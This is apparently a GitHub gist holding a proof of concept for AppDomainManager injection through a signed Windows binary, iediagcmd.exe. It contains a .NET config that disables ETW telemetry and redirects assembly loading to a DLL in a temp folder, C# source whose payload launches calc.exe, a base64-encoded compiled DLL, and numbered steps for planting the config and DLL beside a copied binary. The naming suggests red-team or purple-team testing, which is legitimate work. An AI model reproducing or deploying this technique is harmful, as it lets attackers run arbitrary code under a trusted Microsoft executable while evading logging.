Created
August 20, 2025 18:00
-
-
Save justaguywhocodes/8e35202f09abd6e5c8612e1c755330d7 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <configuration> | |
| <runtime> | |
| <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> | |
| <dependentAssembly> | |
| <assemblyIdentity name="test" publicKeyToken="b44cab5bdd3734c7" culture="neutral" /> | |
| <codeBase version="0.0.0.0" href="file:///C:/TEMP/purple.dll"/> | |
| </dependentAssembly> | |
| </assemblyBinding> | |
| <etwEnable enabled="false" /> | |
| <appDomainManagerAssembly value="test, Version=0.0.0.0, Culture=neutral, PublicKeyToken=b44cab5bdd3734c7" /> | |
| <appDomainManagerType value="MyAppDomainManager" /> | |
| </runtime> | |
| </configuration> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; // Add this for Process.Start | |
| public class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { | |
| // Launch calc.exe instead of showing a message box | |
| Process.Start("calc.exe"); | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Generate the key (sn.exe -k key.snk) | |
| 2. Create the .cs file, popping a shell | |
| 3. Compile the .cs file in vs2022, generating the DLL (csc.exe /target:library /keyfile:key.snk /out:CIBETHICAL-1680.dll /reference:System.Windows.Forms.dll Class1.cs) | |
| 4. Decode the dll b64, saving to destination | |
| 5. Update the .config file, placing the dll into a user accessible folder | |
| 6. Copy the iediagcmd.exe file into Desktop, or C:/Users/Public/Downloads, save it as iediagcmd.exe.config | |
| 7. Execute the iediagcmd exe | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment